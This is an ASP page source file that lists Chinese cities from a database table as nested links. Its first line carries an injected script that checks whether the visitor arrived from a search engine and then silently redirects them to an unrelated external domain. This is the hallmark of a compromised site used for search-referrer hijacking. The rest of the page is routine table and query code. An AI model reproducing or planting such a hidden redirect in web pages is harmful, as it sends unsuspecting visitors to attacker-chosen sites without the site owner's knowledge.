d:\wwwroot\wuchunhua\city_more.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
<!--#include file="head.asp"-->
002:
<table width="860" border="0" align="center" cellpadding="0" cellspacing="0">
003:
<tr>
004:
<td><img src="images/news_0032.gif" width="860" height="35"></td>
005:
</tr>
006:
</table>
007:
<table width="860" border="0" align="center" cellpadding="0" cellspacing="2" bgcolor="CACD1A">
008:
<tr>
009:
<td bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="8" cellpadding="0">
010:
<tr>
011:
<td valign='top' width="50%">
012:
<p style="line-height: 180%">
013:
<%
i=0
014:
set rs=server.CreateObject("adodb.recordset")
015:
rs.Open "select * from china_city where twoid=0 and threeid=0 order by indexid",conn,1,1
016:
do while not rs.eof
%
>
017:
<table width="100%" border="0" cellspacing="8" cellpadding="0"><tr><td width="5%"><img src="images/news_0033.gif"></td><td><a target="_blank" href="index.asp?city_oneid=
<%
=rs("id")
%
>&city_twoid=
<%
=rs("twoid")
%
>&city_threeid=
<%
=rs("threeid")
%
>"><font style="font-size:10.5pt" color="#1835D1"><b>
<%
=rs("city")
%
></b></font></a></td></tr>
018:
<%
set rsi=conn.execute("select * from china_city where id="&rs("id")&" and twoid<>0 and threeid=0 order by indexid,id,twoid")
019:
response.write "<tr><td></td><td>"
020:
do while not rsi.eof
%
>
021:
<a target="_blank" href="index.asp?city_oneid=
<%
=rsi("id")
%
>&city_twoid=
<%
=rsi("twoid")
%
>&city_threeid=
<%
=rsi("threeid")
%
>"> <font style="font-size:9pt" color="#1835D1">
<%
=rsi("city")
%
></font></a><font color="#CCCCCC">|</font>
022:
<%
rsi.movenext
023:
loop
024:
response.write "</td></tr></table>"
025:
i=i+1
026:
if i mod 2=0 then
027:
response.Write "</td></tr><tr><td valign='top' width='50%'>"
028:
else
029:
response.Write "</td><td valign='top' width='50%'>"
030:
end if
031:
rsi.close
032:
rs.movenext
033:
loop
034:
rs.close
035:
set rs=nothing
036:
%
>
037:
</span></td>
038:
</tr>
039:
</table>
040:
041:
</table>
042:
<table border="0" cellpadding="0" cellspacing="0" align="center" id="table17">
043:
<tr>
044:
<td height="8"></td>
045:
</tr>
046:
</table>
047:
<title></title>
048:
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
049:
<!--#include file="foot.asp"-->
050:
051: